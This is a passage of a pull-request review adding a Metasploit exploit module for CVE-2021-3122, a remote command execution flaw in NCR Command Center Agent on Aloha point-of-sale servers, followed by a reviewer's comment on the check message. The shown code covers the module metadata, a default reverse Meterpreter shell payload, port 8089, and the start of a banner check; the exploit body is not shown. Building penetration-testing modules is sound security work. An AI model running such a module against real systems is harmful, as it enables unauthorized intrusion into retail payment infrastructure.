modules/exploits/windows/misc/ncr_cmcagent_rce.rb

```diff
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'NCR Command Center Agent Remote Code Execution',
+        'Description' => %q{
+          CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter
+          (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command
+          as SYSTEM, as exploited in the wild in 2020 and/or 2021. The vendor's position is that exploitation occurs only
+          on devices with a certain "misconfiguration."
+        },
+        'Author' => [
+          'daffainfo (Muhammad Daffa)',
+          'jjcho (Jericho Nathanael Chrisnanta)'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-3122'],
+          ['URL', 'https://www.tetradefense.com/incident-response-services/active-exploit-a-remote-code-execution-rce-vulnerability-for-ncr-aloha-point-of-sale/'],
+          ['URL', 'https://hcs-team.com/blog/cve-2021-3122/'],
+        ],
+        'DisclosureDate' => '2021-02-07',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Privileged' => true,
+        'Targets' => [
+            [
+              'Windows',
+              {
+                'Platform' => 'win',
+                'Arch' => [ ARCH_X64, ARCH_X86 ],
+                'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp'}
+              }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        },
+        'DefaultTarget'  => 0,
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8089)
+      ]
+    )
+  end
+
+  def check 
+    connect 
+    banner = sock.get_once 
+    disconnect 
+    if (banner.to_s =~ /<cmcsys:myNodeNumber/) 
+      return Exploit::CheckCode::Detected 
```

Comment:
Here, we usually leave a message for users, so they might have better understanding of what's going on. 
```suggestion
      return Exploit::CheckCode::Detected("CMCAgent detected").
```